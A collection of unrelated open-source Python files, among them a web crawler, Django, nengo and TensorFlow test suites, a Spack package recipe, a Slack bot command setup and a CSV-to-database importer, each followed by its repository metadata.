return asyncio.get_current_task(loop=self._loop)
@contextlib.contextmanager
def _request_context(self, request, response):
self._context[self.task] = {'request': request, 'response': response}
try:
yield
finally:
del self._context[self.task]
@abc.abstractmethod
def parse(self, response):
pass
class Route:
def __init__(self, pattern, callback):
self.pattern = re.compile(pattern)
self.callback = callback
def filter_urls(self, urls):
return (url for url in urls if self.pattern.search(url))
class RouteSpider(Spider):
def __init__(self, middlewares=None, routes=None, **config):
super().__init__(middlewares=middlewares, **config)
self._routes = routes or []
def route(self, pattern):
def wrapper(callback):
self._routes.append(Route(callback, pattern))
return callback
return wrapper
def parse(self, response):
route = response.request.meta.get('route')
if route:
route.callback(self, response)
parsed = pyquery.PyQuery(response.content)
elms = parsed('a[href]')
hrefs = elms.map(lambda: urlparse.urljoin(response.request.url, pyquery.PyQuery(this).attr('href')))
for route in self._routes:
for url in route.filter_urls(hrefs):
self.enqueue_request(url=url, route=route)
| jmcarp/pycrawl | pycrawl/crawl.py | Python | bsd-3-clause | 3,966 |
from muntjac.api import VerticalLayout, Link
from muntjac.terminal.theme_resource import ThemeResource
from muntjac.terminal.external_resource import ExternalResource
class LinkCurrentWindowExample(VerticalLayout):
_CAPTION = 'Open Google'
_TOOLTIP = 'http://www.google.com'
_ICON = ThemeResource('../sampler/icons/icon_world.gif')
def __init__(self):
super(LinkCurrentWindowExample, self).__init__()
self.setSpacing(True)
# Link w/ text and tooltip
l = Link(self._CAPTION, ExternalResource('http://www.google.com'))
l.setDescription(self._TOOLTIP)
self.addComponent(l)
# Link w/ text, icon and tooltip
l = Link(self._CAPTION, ExternalResource('http://www.google.com'))
l.setDescription(self._TOOLTIP)
l.setIcon(self._ICON)
self.addComponent(l)
# Link w/ icon and tooltip
l = Link()
l.setResource(ExternalResource('http://www.google.com'))
l.setDescription(self._TOOLTIP)
l.setIcon(self._ICON)
self.addComponent(l)
| rwl/muntjac | muntjac/demo/sampler/features/link/LinkCurrentWindowExample.py | Python | apache-2.0 | 1,076 |
from django.shortcuts import resolve_url
from django.test import TestCase
from InternetSemLimites.core.models import Provider, State
class TestGet(TestCase):
def setUp(self):
sc, *_ = State.objects.get_or_create(abbr='SC', name='Santa Catarina')
go, *_ = State.objects.get_or_create(abbr='GO', name='Goiás')
props = {'name': 'Xpto',
'url': 'http://xp.to',
'source': 'http://twitter.com/xpto',
'category': Provider.SHAME,
'other': 'Lorem ipsum',
'status': Provider.PUBLISHED}
provider = Provider.objects.create(**props)
provider.coverage.set([sc, go])
self.resp = self.client.get(resolve_url('api:shame'))
def test_get(self):
self.assertEqual(200, self.resp.status_code)
def test_type(self):
self.assertEqual('application/json', self.resp['Content-Type'])
def test_contents(self):
json_resp = self.resp.json()
shame = json_resp['providers']
with self.subTest():
self.assertEqual(1, len(shame))
self.assertNotIn('fame', json_resp)
self.assertEqual('Xpto', shame[0]['name'])
self.assertEqual('http://xp.to', shame[0]['url'])
self.assertEqual('http://twitter.com/xpto', shame[0]['source'])
self.assertEqual(['GO', 'SC'], shame[0]['coverage'])
self.assertEqual('Hall of Shame', shame[0]['category'])
self.assertEqual('Lorem ipsum', shame[0]['other'])
| InternetSemLimites/PublicAPI | InternetSemLimites/api/tests/test_shame_view.py | Python | mit | 1,538 |
import mock
import nengo
import numpy as np
import pytest
from nengo_spinnaker import utils
def test_decoder_generation():
"""Ensure that Decoders are only generated when absolutely necessary!"""
model = nengo.Network()
with model:
a = nengo.Ensemble(100, 3)
b = nengo.Node(lambda t, v: None, size_in=3, size_out=0)
c = nengo.Node(lambda t, v: None, size_in=3, size_out=0)
# Create a series of connections, some identical, some otherwise
c1 = nengo.Connection(a, b)
c2 = nengo.Connection(a, c) # Should share decoder with c1
f = lambda v: v**2
c3 = nengo.Connection(a, b, function=f) # Share ()
c4 = nengo.Connection(a, c, function=f,
transform=np.random.normal(size=(3, 3))) # Share (c3)
c5 = nengo.Connection(a, c, solver=nengo.decoders.LstsqL2()) # Share ()
c6 = nengo.Connection(a, c, eval_points=np.random.normal((100,2))) # !Share
c7 = nengo.Connection(a, c, transform=3)
# Build the decoders in order
decoder_build_func = mock.Mock()
decoder_build_func.return_value = 0.
decoder_builder = utils.decoders.DecoderBuilder(decoder_build_func)
# Build C1, should cause the decoder build func to be called
decoder_builder.get_transformed_decoder(c1.function, c1.transform,
c1.eval_points, c1.solver)
decoder_build_func.assert_called_with(
c1.function, c1.eval_points, c1.solver)
# Build C2, should NOT cause the decoder build func to be called
decoder_build_func.reset_mock()
decoder_builder.get_transformed_decoder(c2.function, c2.transform,
c2.eval_points, c2.solver)
assert(not decoder_build_func.called)
# Build C3, should cause the decoder build func to be called
decoder_build_func.reset_mock()
decoder_builder.get_transformed_decoder(c3.function, c3.transform,
c3.eval_points, c3.solver)
decoder_build_func.assert_called_with(
c3.function, c3.eval_points, c3.solver)
# Build C4, should NOT ...
decoder_build_func.reset_mock()
decoder_builder.get_transformed_decoder(c4.function, c4.transform,
c4.eval_points, c4.solver)
assert(not decoder_build_func.called)
# Build C5, should ...
decoder_build_func.reset_mock()
decoder_builder.get_transformed_decoder(c5.function, c5.transform,
c5.eval_points, c5.solver)
decoder_build_func.assert_called_with(
c5.function, c5.eval_points, c5.solver)
# Build C6, should ...
decoder_build_func.reset_mock()
decoder_builder.get_transformed_decoder(c6.function, c6.transform,
c6.eval_points, c6.solver)
decoder_build_func.assert_called_with(
c6.function, c6.eval_points, c6.solver)
# Check that the decoder is transformed
dec = np.random.uniform((3, 100))
decoder_builder = utils.decoders.DecoderBuilder(lambda f, e, s: dec)
tdec = decoder_builder.get_transformed_decoder(c7.function, c7.transform,
c7.eval_points, c7.solver)
assert(np.all(tdec == np.dot(dec, 3)))
def test_get_compressed_decoder():
"""Compressing decoders removes columns from the decoder where all the
values are 0.0 (and hence no neuron ever affects them!). The new decoder
and the indices of the remaining dimensions should be returned.
"""
# Generate a new random decoder, and zero out columns 1, 5, 6
dec = np.random.normal(size=(100, 7))
for d in [0, 4, 5]:
for n in range(100):
dec[n][d] = 0.
# Get a compressed version of the decoder, and a list of used dimensions
(dims, cdec) = utils.decoders.get_compressed_decoder(dec)
assert(dims == [1, 2, 3, 6])
assert(cdec.shape == (100, 4))
assert(cdec[0][0] == dec[0][1])
assert(cdec[0][3] == dec[0][6])
def test_get_compressed_decoders():
"""Should take a list of decoders (and optionally a list of indices and
other attachments), compress the decoders and return a list of
(attachment, index, dimension) tuples.
Attachments are for things like KeySpaces - basically this is compress and
zip.
"""
dec1 = np.array([[1.]*8]*100)
dec2 = np.array([[2.]*10]*100)
# Select which columns to zero out
rdims_1 = set(np.random.randint(7, size=3).tolist())
rdims_2 = set(np.random.randint(8, size=4).tolist())
dims1 = [n for n in range(8) if n not in rdims_1]
dims2 = [n for n in range(10) if n not in rdims_2]
final_length = len(dims1) + len(dims2)
# Zero out those columns
for n in range(100):
for d in rdims_1:
dec1[n][d] = 0.
for d in rdims_2:
dec2[n][d] = 0.
# Construct the compressed decoder
(headers, cdec) = utils.decoders.get_combined_compressed_decoders(
[dec1, dec2])
assert(cdec.shape == (100, final_length))
# Assert the missing dimensions are missing and the decoders were indexed
ids = [(None, 0, d) for d in dims1]
ids.extend([(None, 1, d) for d in dims2])
assert(ids == headers)
def test_get_compressed_decoders_with_indices():
# Construct a set of 7 decoders
n_neurons = 500
decoders = []
dimensions = []
for i in range(7):
n_dims = np.random.randint(3, 10)
dec = np.random.uniform(0.1, 1, size=(n_neurons, n_dims))
# Construct a set of missing dimensions
missing_dims = set(np.random.randint(n_dims,
size=np.random.randint(n_dims/3)))
# Construct the set of present dimensions
dims = [n for n in range(n_dims) if n not in missing_dims]
# Zero the missing dimensions
for n in range(n_neurons):
for d in missing_dims:
dec[n][d] = 0.
decoders.append(dec)
dimensions.append(dims)
# Construct what we expect the header to look like
indices = [8, 7, 6, 5, 4, 3, 9]
expected_headers = []
for (i, ds) in zip(indices, dimensions):
expected_headers.extend([(None, i, d) for d in ds])
# Get the combined compressed decoders and check everything is as expected
headers, cdec = utils.decoders.get_combined_compressed_decoders(
decoders, indices)
assert(cdec.shape == (n_neurons, len(expected_headers)))
assert(headers == expected_headers)
def test_get_compressed_decoders_with_headers():
# Construct a set of 7 decoders
n_neurons = 500
decoders = []
dimensions = []
for i in range(7):
n_dims = np.random.randint(3, 10)
dec = np.random.uniform(0.1, 1, size=(n_neurons, n_dims))
# Construct a set of missing dimensions
missing_dims = set(np.random.randint(n_dims,
size=np.random.randint(n_dims/3)))
# Construct the set of present dimensions
dims = [n for n in range(n_dims) if n not in missing_dims]
# Zero the missing dimensions
for n in range(n_neurons):
for d in missing_dims:
dec[n][d] = 0.
decoders.append(dec)
dimensions.append(dims)
# Construct what we expect the header to look like
headers = "ABCDEFG"
indices = range(7)
expected_headers = []
for (h, i, ds) in zip(headers, indices, dimensions):
expected_headers.extend([(h, i, d) for d in ds])
# Get the combined compressed decoders and check everything is as expected
headers, cdec = utils.decoders.get_combined_compressed_decoders(
decoders, indices, headers)
assert(cdec.shape == (n_neurons, len(expected_headers)))
assert(headers == expected_headers)
def test_get_compressed_and_uncompressed_decoders():
# Construct 3 decoders
d1 = np.random.uniform(.1, 1., (100, 5))
d2 = np.zeros((100, 9))
d3 = np.random.uniform(.1, 1., (100, 7))
# Zero some of the elements of d3
for d in [0, 5]:
for n in range(100):
d3[n][d] = 0.
# Compress the decoders
headers, cdec = utils.decoders.get_combined_compressed_decoders(
[d1, d2, d3], compress=[True, False, True])
# d2 should not have been compressed, d3 should have been
assert(cdec.shape[1] == 5 + 9 + 5)
def test_null_decoders():
headers, cdec = utils.decoders.get_combined_compressed_decoders(
[], headers=[])
| ctn-archive/nengo_spinnaker_2014 | nengo_spinnaker/utils/tests/test_decoders.py | Python | mit | 8,579 |
# Copyright 2013-2021 Lawrence Livermore National Security, LLC and other
# Spack Project Developers. See the top-level COPYRIGHT file for details.
#
# SPDX-License-Identifier: (Apache-2.0 OR MIT)
class Adms(AutotoolsPackage):
"""ADMS is a code generator that converts electrical compact device models
specified in high-level description language into ready-to-compile c code
for the API of spice simulators."""
homepage = "https://sourceforge.net/projects/mot-adms/"
url = "https://github.com/Qucs/ADMS/releases/download/release-2.3.7/adms-2.3.7.tar.gz"
git = "https://github.com/Qucs/ADMS.git"
maintainers = ['cessenat']
version('master', branch='master')
version('2.3.7', sha256='3a78e1283ecdc3f356410474b3ff44c4dcc82cb89772087fd3bbde8a1038ce08')
depends_on('[email protected]:', type='build')
depends_on('flex', type='build')
depends_on('perl-xml-libxml', type='build')
@when('@master')
def autoreconf(self, spec, prefix):
sh = which('sh')
sh('./bootstrap.sh')
| LLNL/spack | var/spack/repos/builtin/packages/adms/package.py | Python | lgpl-2.1 | 1,052 |
from django.contrib.auth.models import User, Group
from rest_framework import viewsets
from .serializer import UserSerializer, GroupSerializer, ProfileSerializer
from .models import Profile
class UserViewSet(viewsets.ModelViewSet):
queryset = User.objects.all().order_by('-date_joined')
serializer_class = UserSerializer
class ProfileViewSet(viewsets.ModelViewSet):
queryset = Profile.objects.all()
serializer_class = ProfileSerializer
class GroupViewSet(viewsets.ModelViewSet):
queryset = Group.objects.all()
serializer_class = GroupSerializer
| Towhidn/django-boilerplate | account/api.py | Python | mit | 557 |
# -*- coding: utf-8 -*-
def uri():
valores = []
par = 0
impar = 0
positivo = 0
negativo = 0
for i in range(0, 5):
valores.append(input())
if(float(valores[i]) % 2 == 0): par += 1
else: impar += 1
if(float(valores[i]) > 0): positivo += 1
elif(float(valores[i]) < 0): negativo += 1
print('{} valor(es) par(es)\n{} valor(es) impar(es)\n{} valor(es) positivo(s)\n{} valor(es) negativo(s)'.format(par, impar, positivo, negativo))
if __name__ == '__main__':
uri()
| gustavolcorreia/uri | iniciante/exerc1066.py | Python | apache-2.0 | 533 |
import pandas.util.testing as tm
class BaseExtensionTests(object):
assert_series_equal = staticmethod(tm.assert_series_equal)
assert_frame_equal = staticmethod(tm.assert_frame_equal)
assert_extension_array_equal = staticmethod(
tm.assert_extension_array_equal
)
| louispotok/pandas | pandas/tests/extension/base/base.py | Python | bsd-3-clause | 288 |
# Copyright 2016 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Tests for TaskRunner and Experiment class."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import json
import os
import sys
import tempfile
import threading
# TODO: #6568 Remove this hack that makes dlopen() not crash.
if hasattr(sys, 'getdlopenflags') and hasattr(sys, 'setdlopenflags'):
import ctypes
sys.setdlopenflags(sys.getdlopenflags() | ctypes.RTLD_GLOBAL)
from tensorflow.contrib.learn.python.learn import evaluable
from tensorflow.contrib.learn.python.learn import experiment
from tensorflow.contrib.learn.python.learn import monitors
from tensorflow.contrib.learn.python.learn import run_config
from tensorflow.contrib.learn.python.learn import trainable
from tensorflow.contrib.learn.python.learn.estimators import run_config as run_config_lib
from tensorflow.contrib.learn.python.learn.utils import saved_model_export_utils
from tensorflow.core.protobuf import config_pb2
from tensorflow.python.client import session
from tensorflow.python.ops import variables
from tensorflow.python.platform import test
from tensorflow.python.platform import tf_logging
from tensorflow.python.training import saver
from tensorflow.python.training import server_lib
from tensorflow.python.training import session_run_hook
from tensorflow.python.util import compat
from tensorflow.python.util.all_util import reveal_undocumented
class SheepCounter(object):
"""To be patched in for time.sleep, in order to capture how long was slept."""
def __init__(self):
self._total_time = 0
self._sleeptimes = []
def __call__(self, t):
self._total_time += t
self._sleeptimes += [t]
@property
def total_time(self):
return self._total_time
@property
def sleep_times(self):
return self._sleeptimes
class TestEstimator(evaluable.Evaluable, trainable.Trainable):
def __init__(self, config=None, max_evals=5):
self.eval_count = 0
self.fit_count = 0
self._max_evals = max_evals
self.export_count = 0
self.monitors = []
self.eval_hooks = []
self._config = config or run_config.RunConfig()
self._model_dir = tempfile.mkdtemp()
@property
def model_dir(self):
return self._model_dir
@property
def config(self):
return self._config
def evaluate(self, **kwargs):
tf_logging.info('evaluate called with args: %s' % kwargs)
if 'hooks' in kwargs:
self.eval_hooks = kwargs['hooks']
self.eval_count += 1
if self.eval_count > self._max_evals:
tf_logging.info('Ran %d evals. Done.' % self.eval_count)
raise StopIteration()
return [(key, kwargs[key]) for key in sorted(kwargs.keys())]
def fake_checkpoint(self):
save_path = os.path.join(self.model_dir, 'model.ckpt')
with session.Session() as sess:
var = variables.Variable(1.0, name='var0')
save = saver.Saver({var.op.name: var})
var.initializer.run()
save.save(sess, save_path, global_step=0)
def fit(self, **kwargs):
self.fake_checkpoint()
tf_logging.info('fit called with args: %s' % kwargs)
self.fit_count += 1
if 'monitors' in kwargs:
self.monitors = kwargs['monitors']
return [(key, kwargs[key]) for key in sorted(kwargs.keys())]
def export_savedmodel(self, export_dir_base, serving_input_fn, **kwargs):
tf_logging.info('export_savedmodel called with args: %s, %s, %s' %
(export_dir_base, serving_input_fn, kwargs))
self.export_count += 1
return os.path.join(
compat.as_bytes(export_dir_base), compat.as_bytes('bogus_timestamp'))
class _NoopHook(session_run_hook.SessionRunHook):
pass
class ExperimentTest(test.TestCase):
def _cluster_spec(self):
return {
run_config_lib.TaskType.PS: ['host1:2222', 'host2:2222'],
run_config_lib.TaskType.WORKER:
['host3:2222', 'host4:2222', 'host5:2222']
}
def test_train(self):
est = TestEstimator()
ex = experiment.Experiment(
est,
train_input_fn='train_input',
train_steps='train_steps',
eval_input_fn='eval_input',
eval_metrics='eval_metrics')
fit_args = ex.train(delay_secs=0)
self.assertEquals(1, est.fit_count)
self.assertIn(('max_steps', 'train_steps'), fit_args)
self.assertEquals(0, est.eval_count)
def test_train_delay(self):
est = TestEstimator()
ex = experiment.Experiment(
est, train_input_fn='train_input', eval_input_fn='eval_input')
for delay in [0, 1, 3]:
with test.mock.patch('time.sleep', SheepCounter()) as sheep:
ex.train(delay_secs=delay)
self.assertAlmostEqual(delay, sheep.total_time, delta=0.1)
def test_train_default_delay(self):
for task_id in [0, 1, 3]:
tf_config = {'task': {'index': task_id}}
with test.mock.patch.dict('os.environ',
{'TF_CONFIG': json.dumps(tf_config)}):
config = run_config.RunConfig()
est = TestEstimator(config)
ex = experiment.Experiment(
est, train_input_fn='train_input', eval_input_fn='eval_input')
with test.mock.patch('time.sleep', SheepCounter()) as sheep:
ex.train()
self.assertAlmostEqual(task_id * 5, sheep.total_time, delta=0.1)
@test.mock.patch.object(server_lib, 'Server')
def test_train_starts_server(self, mock_server):
# Arrange.
tf_config = {
'cluster': self._cluster_spec(),
'environment': run_config_lib.Environment.CLOUD,
'task': {
'type': run_config_lib.TaskType.WORKER,
'index': 1
}
}
with test.mock.patch.dict('os.environ',
{'TF_CONFIG': json.dumps(tf_config)}):
config = run_config_lib.RunConfig(
master='host4:2222', num_cores=15, gpu_memory_fraction=0.314)
est = TestEstimator(config)
ex = experiment.Experiment(
est, train_input_fn='train_input', eval_input_fn='eval_input')
# Act.
# We want to make sure we discount the time it takes to start the server
# in our accounting of the delay, so we set a small delay here.
with test.mock.patch('time.sleep', SheepCounter()) as sheep:
ex.train(delay_secs=1)
# Ensure that the delay takes into account the time to start the server.
self.assertAlmostEqual(1, sheep.total_time, delta=0.1)
# Assert.
expected_config_proto = config_pb2.ConfigProto()
expected_config_proto.inter_op_parallelism_threads = 15
expected_config_proto.intra_op_parallelism_threads = 15
expected_config_proto.gpu_options.per_process_gpu_memory_fraction = 0.314
mock_server.assert_called_with(
config.cluster_spec,
job_name=run_config_lib.TaskType.WORKER,
task_index=1,
config=expected_config_proto,
start=False)
mock_server.assert_has_calls([test.mock.call().start()])
@test.mock.patch.object(server_lib, 'Server')
def test_train_server_does_not_start_without_cluster_spec(self, mock_server):
config = run_config_lib.RunConfig(master='host4:2222')
ex = experiment.Experiment(
TestEstimator(config),
train_input_fn='train_input',
eval_input_fn='eval_input')
ex.train()
# The server should not have started because there was no ClusterSpec.
self.assertFalse(mock_server.called)
@test.mock.patch.object(server_lib, 'Server')
def test_train_server_does_not_start_with_empty_master(self, mock_server):
tf_config = {'cluster': self._cluster_spec()}
with test.mock.patch.dict('os.environ',
{'TF_CONFIG': json.dumps(tf_config)}):
config = run_config_lib.RunConfig(master='')
ex = experiment.Experiment(
TestEstimator(config),
train_input_fn='train_input',
eval_input_fn='eval_input')
ex.train()
# The server should not have started because master was the empty string.
self.assertFalse(mock_server.called)
def test_train_raises_if_job_name_is_missing(self):
tf_config = {
'cluster': self._cluster_spec(),
'environment': run_config_lib.Environment.CLOUD,
'task': {
'index': 1
}
}
with test.mock.patch.dict(
'os.environ',
{'TF_CONFIG': json.dumps(tf_config)}), self.assertRaises(ValueError):
config = run_config_lib.RunConfig(
master='host3:2222' # Normally selected by task type.
)
ex = experiment.Experiment(
TestEstimator(config),
train_input_fn='train_input',
eval_input_fn='eval_input')
ex.train()
def test_evaluate(self):
est = TestEstimator()
est.fake_checkpoint()
noop_hook = _NoopHook()
ex = experiment.Experiment(
est,
train_input_fn='train_input',
eval_input_fn='eval_input',
eval_metrics='eval_metrics',
eval_hooks=[noop_hook],
eval_steps='steps',
eval_delay_secs=0)
ex.evaluate()
self.assertEquals(0, est.fit_count)
self.assertEquals(1, est.eval_count)
self.assertEquals([noop_hook], est.eval_hooks)
def test_evaluate_delay(self):
est = TestEstimator()
est.fake_checkpoint()
noop_hook = _NoopHook()
ex = experiment.Experiment(
est, train_input_fn='train_input', eval_input_fn='eval_input',
eval_hooks=[noop_hook])
for delay in [0, 1, 3]:
with test.mock.patch('time.sleep', SheepCounter()) as sheep:
ex.evaluate(delay_secs=delay)
self.assertAlmostEqual(delay, sheep.total_time, delta=0.1)
self.assertEquals([noop_hook], est.eval_hooks)
def test_continuous_eval(self):
est = TestEstimator()
est.fake_checkpoint()
noop_hook = _NoopHook()
ex = experiment.Experiment(
est,
train_input_fn='train_input',
eval_input_fn='eval_input',
eval_metrics='eval_metrics',
eval_hooks=[noop_hook],
eval_delay_secs=0,
continuous_eval_throttle_secs=0)
self.assertRaises(
StopIteration, ex.continuous_eval, evaluate_checkpoint_only_once=False)
self.assertEquals(0, est.fit_count)
self.assertEquals(6, est.eval_count)
self.assertEquals([noop_hook], est.eval_hooks)
def test_continuous_eval_throttle_delay(self):
for delay in [0, 1, 2]:
est = TestEstimator()
est.fake_checkpoint()
noop_hook = _NoopHook()
ex = experiment.Experiment(
est,
train_input_fn='train_input',
eval_input_fn='eval_input',
eval_metrics='eval_metrics',
eval_hooks=[noop_hook],
continuous_eval_throttle_secs=delay,
eval_delay_secs=0)
with test.mock.patch('time.sleep', SheepCounter()) as sheep:
self.assertRaises(
StopIteration,
ex.continuous_eval,
evaluate_checkpoint_only_once=False)
self.assertAlmostEqual(5 * delay, sheep.total_time, delta=0.1)
def test_continuous_eval_predicate_fn(self):
est = TestEstimator()
est.fake_checkpoint()
noop_hook = _NoopHook()
def _predicate_fn(unused_eval_result):
return est.eval_count < 3
ex = experiment.Experiment(
est,
train_input_fn='train_input',
eval_input_fn='eval_input',
eval_metrics='eval_metrics',
eval_hooks=[noop_hook],
eval_delay_secs=0,
continuous_eval_throttle_secs=0,
continuous_eval_predicate_fn=_predicate_fn)
ex.continuous_eval(evaluate_checkpoint_only_once=False)
self.assertEquals(0, est.fit_count)
self.assertEquals(3, est.eval_count)
self.assertEquals([noop_hook], est.eval_hooks)
def test_run_local(self):
est = TestEstimator()
noop_hook = _NoopHook()
ex = experiment.Experiment(
est,
train_input_fn='train_input',
eval_input_fn='eval_input',
eval_metrics='eval_metrics',
eval_hooks=[noop_hook],
train_steps=100,
eval_steps=100,
local_eval_frequency=10)
ex.local_run()
self.assertEquals(1, est.fit_count)
self.assertEquals(1, est.eval_count)
self.assertEquals(1, len(est.monitors))
self.assertEquals([noop_hook], est.eval_hooks)
self.assertTrue(isinstance(est.monitors[0], monitors.ValidationMonitor))
def test_train_monitors_returns_shallow_copy(self):
noop_hook = _NoopHook()
ex = experiment.Experiment(
TestEstimator(),
train_input_fn='train_input',
eval_input_fn='eval_input',
eval_metrics='eval_metrics',
train_monitors=[noop_hook],
train_steps=100,
eval_steps=100,
local_eval_frequency=10)
self.assertAllEqual([noop_hook], ex.train_hooks)
another_noop_hook = _NoopHook()
# Assert that the property getter returns a shallow copy.
ex.train_hooks.extend([another_noop_hook])
self.assertAllEqual([noop_hook], ex.train_hooks)
# Assert that the extend API mutates the monitors.
ex.extend_train_hooks([another_noop_hook])
self.assertAllEqual([noop_hook, another_noop_hook], ex.train_hooks)
def test_train_and_evaluate(self):
est = TestEstimator()
noop_hook = _NoopHook()
export_strategy = saved_model_export_utils.make_export_strategy(
est, 'export_input', exports_to_keep=None)
ex = experiment.Experiment(
est,
train_input_fn='train_input',
eval_input_fn='eval_input',
eval_metrics='eval_metrics',
eval_hooks=[noop_hook],
train_steps=100,
eval_steps=100,
export_strategies=export_strategy)
ex.train_and_evaluate()
self.assertEquals(1, est.fit_count)
self.assertEquals(1, est.eval_count)
self.assertEquals(1, est.export_count)
self.assertEquals(1, len(est.monitors))
self.assertEquals([noop_hook], est.eval_hooks)
self.assertTrue(isinstance(est.monitors[0], monitors.ValidationMonitor))
@test.mock.patch.object(server_lib, 'Server')
def test_run_std_server(self, mock_server):
# Arrange.
tf_config = {
'cluster': self._cluster_spec(),
'task': {
'type': run_config_lib.TaskType.PS,
'index': 1
}
}
with test.mock.patch.dict('os.environ',
{'TF_CONFIG': json.dumps(tf_config)}):
config = run_config_lib.RunConfig(
master='host2:2222',
num_cores=15,
gpu_memory_fraction=0.314,)
est = TestEstimator(config)
ex = experiment.Experiment(
est, train_input_fn='train_input', eval_input_fn='eval_input')
# Act.
ex.run_std_server()
# Assert.
mock_server.assert_has_calls(
[test.mock.call().start(), test.mock.call().join()])
@test.mock.patch.object(server_lib, 'Server')
def test_run_std_server_raises_without_cluster_spec(self, mock_server):
config = run_config_lib.RunConfig(master='host4:2222')
with self.assertRaises(ValueError):
ex = experiment.Experiment(
TestEstimator(config),
train_input_fn='train_input',
eval_input_fn='eval_input')
ex.run_std_server()
def test_test(self):
est = TestEstimator()
ex = experiment.Experiment(
est, train_input_fn='train_input', eval_input_fn='eval_input')
ex.test()
self.assertEquals(1, est.fit_count)
self.assertEquals(1, est.eval_count)
def test_continuous_eval_evaluates_checkpoint_once(self):
# Temporarily disabled until we figure out the threading story on Jenkins.
return
# pylint: disable=unreachable
# The TestEstimator will raise StopIteration the second time evaluate is
# called.
ex = experiment.Experiment(
TestEstimator(max_evals=1),
train_input_fn='train_input',
eval_input_fn='eval_input')
# This should not happen if the logic restricting evaluation of the same
# checkpoint works. We do need some checkpoint though, otherwise Experiment
# will never evaluate.
ex.estimator.fake_checkpoint()
# Start a separate thread with continuous eval
thread = threading.Thread(
target=lambda: ex.continuous_eval(delay_secs=0, throttle_delay_secs=0))
thread.start()
# The thread will die if it evaluates twice, and we should never evaluate
# twice since we don't write another checkpoint. Since we did not enable
# throttling, if it hasn't died after two seconds, we're good.
thread.join(2)
self.assertTrue(thread.is_alive())
# But we should have evaluated once.
count = ex.estimator.eval_count
self.assertEquals(1, count)
if __name__ == '__main__':
test.main()
| anilmuthineni/tensorflow | tensorflow/contrib/learn/python/learn/experiment_test.py | Python | apache-2.0 | 17,120 |
from unittest import TestCase
class TestApp(TestCase):
def test_make_app(self):
from pyramid.router import Router
from yait.app import make_app
global_settings = {}
settings = {'yait.db_url': 'sqlite://',
'yait.auth.secret': 'secret',
'yait.auth.secure_only': 'false',
'yait.auth.timeout': '10',
'yait.session.secret': 'secret'}
wsgi_app = make_app(global_settings, **settings)
self.assertIsInstance(wsgi_app, Router)
| dbaty/Yait | yait/tests/test_app.py | Python | bsd-3-clause | 553 |
import re # noqa
import logging
import argparse
from slackbot_queue import slack_controller, queue
# import commands here
from example import Example
from example2 import Example2
logging.basicConfig(level=logging.INFO,
format='%(asctime)s - %(name)s - %(levelname)s - %(message)s')
logger = logging.getLogger(__name__)
parser = argparse.ArgumentParser(description='Slackbot with task queue')
parser.add_argument('-w', '--worker', action='store_true', help='If set, this will run as a worker')
args = parser.parse_args()
def custom_help(commands, full_event, slack_client):
""" This is currently what the default function does.
Args:
commands (list): List of the command classes that are in the channel where help was triggered
full_event (dict): All of the data from the slack client
slack_client (SlackClient): Api to send message directly to the slack api
Returns:
dict/None: dict of dat to send to the slack api
the keys `channel` & `as_user` & `method` are added before posting on return
"""
message_data = {'method': 'chat.postEphemeral',
'user': full_event['user']['id'],
'text': 'Here are all the commands available in this channel',
'attachments': [],
}
# # Add a reaction the the help command so others know the bot responded (not in the default help function)
# slack_client.api_call(**{'method': 'reactions.add',
# 'name': 'ok_hand',
# 'channel': full_event['channel']['id'],
# 'timestamp': full_event['message']['ts'],
# })
for command in commands:
try:
parsed_response = command.help()
if parsed_response is not None:
# Add the help message from the command to the return message
message_data['attachments'].extend(parsed_response.get('attachments', []))
except AttributeError as e:
logger.warning("Missing help function in class: {e}".format(e=e))
return message_data
queue.conf.task_default_queue = 'custom_slackbot'
queue.conf.broker_url = 'amqp://guest:guest@localhost:5672//'
# By default the slack token is set by the env var `SLACK_BOT_TOKEN`
# But can also be passed in as a named arg to setup as `slack_bot_token="token_here"` and will override the env var
slack_controller.setup()
# # Set a custom regex for the help message trigger. This is the current defult if not manually set
# # Needs to be after .setup() if using the bot_name/id
# slack_controller.help_message_regex = re.compile('^(?:{bot_name} )?help$'.format(bot_name=slack_controller.BOT_NAME),
# flags=re.IGNORECASE)
# # Set a custom help function action.
# slack_controller.help = custom_help
# Each class needs to be passed the `slack_controller`
example = Example(slack_controller)
example2 = Example2(slack_controller)
# Order of the commands in the channel matter, the first match it finds it will stop
# The order of the channels do not matter though
commands = {'__direct_message__': [],
'__all__': [example, example2],
'bot-dev-1': [],
'general': [],
}
slack_controller.add_commands(commands)
if __name__ == '__main__':
if args.worker is False:
slack_controller.start_listener()
else:
slack_controller.start_worker(argv=['celery', 'worker', '--concurrency', '1', '-l', 'info'])
| xtream1101/slackbot-task-queue | example/commands.py | Python | mit | 3,629 |
#-*- coding:utf-8 -*-
import csv
import os.path
from . import basededatos
from . import scian3ramas
def eliminar_tabla():
""" Eliminar tabla """
with basededatos.inegi() as bd:
bd.cursor.execute("DROP TABLE IF EXISTS scian_subramas")
print(" Eliminada la tabla scian_subramas si existía.")
def crear_tabla():
""" Crear tabla """
with basededatos.inegi() as bd:
bd.cursor.execute("""
CREATE TABLE scian_subramas (
id serial PRIMARY KEY,
rama integer REFERENCES scian_ramas NOT NULL,
codigo character(5) UNIQUE,
titulo character varying,
descripcion text
)""")
print(" Creada la tabla scian_ramas.")
def insertar(archivo):
""" Verificar si existe el archivo CSV """
if not os.path.isfile(archivo):
raise Exception("No existe el archivo {}".format(archivo))
""" Insertar registros del archivo CSV a la base de datos """
contador = 0
with basededatos.inegi() as bd:
with open(archivo, newline='') as contenedor:
lector = csv.DictReader(contenedor)
for renglon in lector:
codigo = renglon['Código'].strip()
titulo = renglon['Título'].strip()
descripcion = renglon['Descripción'].strip()
bd.cursor.execute("""
INSERT INTO scian_subramas
(rama, codigo, titulo, descripcion)
VALUES
(%s, %s, %s, %s)
""", (scian3ramas.consultar_codigo(codigo[:4]), codigo, titulo, descripcion,))
contador = contador + 1
print(" Se insertaron {} subramas.".format(contador))
| guivaloz/INEGI | DENUE/scian/scian4subramas.py | Python | gpl-3.0 | 1,825 |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
if __name__ == '__main__':
pass
